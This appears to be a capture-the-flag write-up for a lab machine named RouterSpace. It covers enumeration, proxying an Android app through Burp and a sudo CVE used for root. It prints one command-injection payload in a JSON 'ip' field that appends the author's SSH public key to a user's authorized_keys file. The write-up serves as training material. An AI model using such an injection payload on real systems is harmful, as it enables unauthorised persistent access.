Engagement flow
data:image/s3,"s3://crabby-images/9d800/9d800847748ccd7374d26d92229d7b5085eb6658" alt=""
Enumeration
Port discovery
Web enumeration
apk download
data:image/s3,"s3://crabby-images/ab184/ab184392ca576a4d0737d7221a85393c40ff798e" alt=""
Browsing to the website we see options for a download and a get started now.
data:image/s3,"s3://crabby-images/b3124/b312425a004ace6c5b2474b01df5895b3f1d8a3c" alt=""
We download the provided apk.
data:image/s3,"s3://crabby-images/8e8b8/8e8b861d88979c742dbf6e295f594edac38dbefc" alt=""
From this we install and run anbox on our target. Once anbox is opened, we have to install the actual .apk.
data:image/s3,"s3://crabby-images/29ae6/29ae610ab90c9976209d9f50c520d39c4742afb7" alt=""
User
We have to change our network information in order to intercept and proxy the request with burp suite.
adb shell settings put global http_proxy 192.168.250.1:8080
data:image/s3,"s3://crabby-images/620bb/620bba707ce50da2b07de582b478c0a044121b3d" alt=""
This did not work. After some review I realized the host was routerspace.htb and this needed to be added to the /etc/hosts file.
data:image/s3,"s3://crabby-images/aa4d2/aa4d2badf2795fdf05bc019d219a0fd56a3fe2b8" alt=""
data:image/s3,"s3://crabby-images/e4f51/e4f5114f2b0b04c83b2abd6eba813392e648172c" alt=""
I was not able to gain a reverse shell so I injected my SSH key instead.
{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}
data:image/s3,"s3://crabby-images/692f9/692f985183f585c6f3ac0fda5d3a4fe5d9f74bd5" alt=""
Root
From here we are not able to get the linpeas script uploaded so we pivot and enumerate manually. Checking the Sudo version and researching this version shows us a known CVE.
We copy the 3 files onto our target machine. and run make followed by exploit and we are root!
data:image/s3,"s3://crabby-images/98cb6/98cb6d30d3ca86daf8d410607c2f879eb38e4ca0" alt=""
Comentários